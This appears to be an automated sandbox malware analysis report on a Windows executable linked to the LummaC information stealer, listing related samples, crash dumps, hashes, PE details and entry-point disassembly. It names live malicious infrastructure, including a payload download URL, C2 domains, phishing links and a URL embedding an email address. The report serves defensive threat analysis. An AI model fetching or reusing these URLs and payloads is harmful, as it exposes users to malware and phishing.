                                                                              • Number of non-executed functions: 335
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.76, 52.149.20.212, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              02:34:10API Interceptor8843429x Sleep call for process: DLKs2Qeljg.exe modified
                                                                              02:34:15API Interceptor5x Sleep call for process: 67E6.tmp.exe modified
                                                                              02:34:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                              • twirpx.org/administrator/index.php
                                                                              SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                              • www.antipromil.site/7ykh/
                                                                              104.21.56.70chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                    IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                      J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                        hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                            he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                  176.113.115.19Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  skidjazzyric.clickDPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.112.1
                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.80.1
                                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.80.1
                                                                                                  GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.64.1
                                                                                                  ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.64.1
                                                                                                  post-to-me.comchu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSPO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 188.114.96.3
                                                                                                  PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.112.1
                                                                                                  https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.18.237
                                                                                                  https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  watchdog.elfGet hashmaliciousXmrigBrowse
                                                                                                  • 1.1.1.1
                                                                                                  https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                                                  • 188.114.97.3
                                                                                                  CLOUDFLARENETUSPO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 188.114.96.3
                                                                                                  PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.112.1
                                                                                                  https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.18.237
                                                                                                  https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  watchdog.elfGet hashmaliciousXmrigBrowse
                                                                                                  • 1.1.1.1
                                                                                                  https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                                                  • 188.114.97.3
                                                                                                  SELECTELRULjrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  nYT1CaXH9N.ps1Get hashmaliciousAmadeyBrowse
                                                                                                  • 176.113.115.131
                                                                                                  iy2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                  • 176.113.115.170
                                                                                                  z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 82.148.27.5
                                                                                                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  176.113.115_1.170.ps1Get hashmaliciousXWormBrowse
                                                                                                  • 176.113.115.170
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.48.1
                                                                                                  web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  Rgr8LJz.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  asd.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.48.1
                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  37f463bf4616ecd445d4a1937da06e19Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                                  • 104.21.56.70
                                                                                                  2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.56.70
                                                                                                  2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                                                  • 104.21.56.70
                                                                                                  2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.56.70
                                                                                                  https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.56.70
                                                                                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 104.21.56.70
                                                                                                  HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 104.21.56.70
                                                                                                  D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 104.21.56.70
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\user\AppData\Local\Temp\67E6.tmp.exeLjrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeLjrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.0595102526111593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:RzFbaanswgBVod7Jf3QXIDcQqc67cE9cw3xF+HbHg/wWGTf3hOyc45WAU6NCUtWQ:loaniX0k/3NCjsFmF5zuiFcfZ24IO8d
                                                                                                      MD5:7C2C7C0FA1F9C381CBD77E19120B2AEE
                                                                                                      SHA1:884A3B437226F25574F2B4BB5FEC5793B7969DE9
                                                                                                      SHA-256:C1CCDCEE619AEBC7FF8723AFFD078C17D2CB975DAB3EEE088B2E3C86CC89FFF8
                                                                                                      SHA-512:4689A7BB0C1F61A3CEC787099FA490571501BC8AFE3159DEACAFD1722828838807F919D38FED08A20BD653B914F99B2129AA05BFEA04041C3B9A0273FCAE1B4C
                                                                                                      Malicious:true
                                                                                                      Reputation:low
                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.1.6.6.1.2.7.4.5.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.1.6.6.1.7.2.7.6.7.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.8.f.e.2.6.8.-.3.3.2.0.-.4.a.d.1.-.b.e.6.6.-.6.0.f.3.f.8.7.a.7.a.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.1.1.7.c.e.7.-.b.9.b.c.-.4.a.5.c.-.b.6.c.8.-.7.e.c.c.4.8.b.5.5.7.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.7.E.6...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.1.4.-.2.5.a.7.-.3.b.e.1.6.8.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.e.1.f.8.e.d.f.2.7.0.a.8.4.b.b.c.b.8.9.3.3.e.6.b.4.9.5.1.c.d.5.0.0.0.0.4.2.0.7.!.0.0.0.0.0.9.7.8.4.c.6.e.0.c.0.e.2.b.e.3.6.c.8.3.f.4.1.5.3.5.9.0.8.0.3.9.f.e.1.a.a.3.4.3.!.6.7.E.6...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 15 streams, Thu Jan 9 07:34:21 2025, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):109774
                                                                                                      Entropy (8bit):2.202904692909276
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:WzNEjo87BPrZLsJwY/3XZDTQYgTL9t6NUTT64yZ0PN5RIvi/jyzyU7oF:W2k87BPrZLa/JTQY2SE6vqG7oF
                                                                                                      MD5:2425BAF2C6CE9A5C44274A30EDDA7E74
                                                                                                      SHA1:5D46794BDB3B98B7B37371C46102D22E7649ADA3
                                                                                                      SHA-256:CF57B28B10E30E5C19D06CA994322340642122895054C246726200856A1FEBAC
                                                                                                      SHA-512:01801879BB9B6ABA71FCBCE22EC9DFEA47723CD241299005A8E73CBE3065375B6E1D6516270F689C5ED6416D7C181E597B7FF9A21734738BE33860FBB56521BE
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:MDMP..a..... ........{.g........................p...............h$......$....N..........`.......8...........T...........HE...g...........$...........&..............................................................................eJ......p'......GenuineIntel............T............{.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8332
                                                                                                      Entropy (8bit):3.70222138088457
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:R6l7wVeJq1h6q9gK6Y036xgmfKlLVpDO89b8Lsf0i0m:R6lXJWh6+/6Ys6xgmfKlz8Qfp
                                                                                                      MD5:39A17EA5D825B6FE4E6EE900AC482C91
                                                                                                      SHA1:12AE3E42C997153BD38FFFE91E58CAF3E4854C69
                                                                                                      SHA-256:5D191A6871FD9A5AC7606ECFBC14608CD831FEB40ABC2CBFB45C822751418553
                                                                                                      SHA-512:AA52331FF160F414198F0A6666D289D6B2FF9926BD15EBA534AA89A17B91EAFF5B46006B75B89CC659A5DA33075B99836AE7E9E384B552FD0F7B3342C3D909F2
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4613
                                                                                                      Entropy (8bit):4.4823761755144504
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwWl8zserJg77aI9ClWpW8VY+oYm8M4J1hOqF7+q802O5wiCsIEW9d:uIjfeFI7EU7V3JLHEm7fW9d
                                                                                                      MD5:214F1A691D80A15FFAC61ABE2C839CB4
                                                                                                      SHA1:5E147B7F90597FAA8852BD72FC0AB2ED77E4B5FE
                                                                                                      SHA-256:BA93A517101128B490A6D0090BDCE896B950518402D3B54B183016DF70A1963B
                                                                                                      SHA-512:9929CD783E3D16FAC8AC3ADB787C4CD63E6332FD99BCA69A25ACC3A12173CC21480F9E794BD2277C052CB304A0D38C166AA4790C9A0C13983F18C803ED9E4B31
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668077" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                      Process:C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):341504
                                                                                                      Entropy (8bit):7.257573629179284
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
                                                                                                      MD5:D66791DB5C8D7BF392361E2343F7A5EA
                                                                                                      SHA1:09784C6E0C0E2BE36C83F41535908039FE1AA343
                                                                                                      SHA-256:25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
                                                                                                      SHA-512:E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Ljrprfl3BH.exe, Detection: malicious, Browse
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):341504
                                                                                                      Entropy (8bit):7.257573629179284
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
                                                                                                      MD5:D66791DB5C8D7BF392361E2343F7A5EA
                                                                                                      SHA1:09784C6E0C0E2BE36C83F41535908039FE1AA343
                                                                                                      SHA-256:25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
                                                                                                      SHA-512:E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Ljrprfl3BH.exe, Detection: malicious, Browse
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1835008
                                                                                                      Entropy (8bit):4.465431227325784
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNZdwBCswSbZA:NXD94+WlLZMM6YFHb+ZA
                                                                                                      MD5:8E65892B87B4543B0F2C553FA58E28DC
                                                                                                      SHA1:984DA39C69477C420D529638A4CD3916F7C9C93A
                                                                                                      SHA-256:5C861B1BD841EF22FFA157211826FCD7E6B2CB1B5B2A63717FD454876D924576
                                                                                                      SHA-512:F20B137F368052D3C6378E820031E52C58683F36C5E155F6C738B0CA476B7639D1198159539F7B489AA56A9786D103D881779BAC4DDBC125DF7162C1B49028EC
                                                                                                      Malicious:false
                                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2...hb...............................................................................................................................................................................................................................................................................................................................................l..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.811909941224734
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:DLKs2Qeljg.exe
                                                                                                      File size:503'808 bytes
                                                                                                      MD5:7b98863009146a47f1100922be254455
                                                                                                      SHA1:b808c2c611317cfe78a213c44e9b8fb5a8c00a45
                                                                                                      SHA256:e069cfbb5772d73a5cd15889c0482ff01dbd29bf719d977269c6754eef917672
                                                                                                      SHA512:ad4c25fe532a29e82027551c5dfdeafec7c84fab1d99da190eb1bef2aee1b4ad90085cef531f100f4ff489206d1d779b86c58f957945f38b8085f4310e51238d
                                                                                                      SSDEEP:6144:tvUkKqjCjAkDeekp0sG82VL6/RzYo2JZLGt5Lbx/++zTbuQ6FT67:tvUkKqjCzDe5p0v8C6/RzJ2JF6W4X
                                                                                                      TLSH:E0B49E12B2FA7D54FE7347328E2AD2E4662FFDF14E74225D21147A9F08B29B1C162742
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A].. 3.. 3.. 3..r... 3..r... 3..r... 3...H.. 3.. 2.. 3..r... 3..r... 3..r... 3.Rich. 3.................PE..L...$b.f...........
                                                                                                      Icon Hash:86c7c30b0f4e0d99
                                                                                                      Entrypoint:0x40174f
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x66916224 [Fri Jul 12 17:04:36 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:2730de4ed3972483d7f6345a02ea365a
                                                                                                      Instruction
                                                                                                      call 00007FDB0CDF9F80h
                                                                                                      jmp 00007FDB0CDF560Dh
                                                                                                      mov edi, edi
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 00000328h
                                                                                                      mov dword ptr [00458918h], eax
                                                                                                      mov dword ptr [00458914h], ecx
                                                                                                      mov dword ptr [00458910h], edx
                                                                                                      mov dword ptr [0045890Ch], ebx
                                                                                                      mov dword ptr [00458908h], esi
                                                                                                      mov dword ptr [00458904h], edi
                                                                                                      mov word ptr [00458930h], ss
                                                                                                      mov word ptr [00458924h], cs
                                                                                                      mov word ptr [00458900h], ds
                                                                                                      mov word ptr [004588FCh], es
                                                                                                      mov word ptr [004588F8h], fs
                                                                                                      mov word ptr [004588F4h], gs
                                                                                                      pushfd
                                                                                                      pop dword ptr [00458928h]
                                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                                      mov dword ptr [0045891Ch], eax
                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                      mov dword ptr [00458920h], eax
                                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                                      mov dword ptr [0045892Ch], eax
                                                                                                      mov eax, dword ptr [ebp-00000320h]
                                                                                                      mov dword ptr [00458868h], 00010001h
                                                                                                      mov eax, dword ptr [00458920h]
                                                                                                      mov dword ptr [0045881Ch], eax
                                                                                                      mov dword ptr [00458810h], C0000409h
                                                                                                      mov dword ptr [00458814h], 00000001h
                                                                                                      mov eax, dword ptr [00457004h]
                                                                                                      mov dword ptr [ebp-00000328h], eax
                                                                                                      mov eax, dword ptr [00457008h]
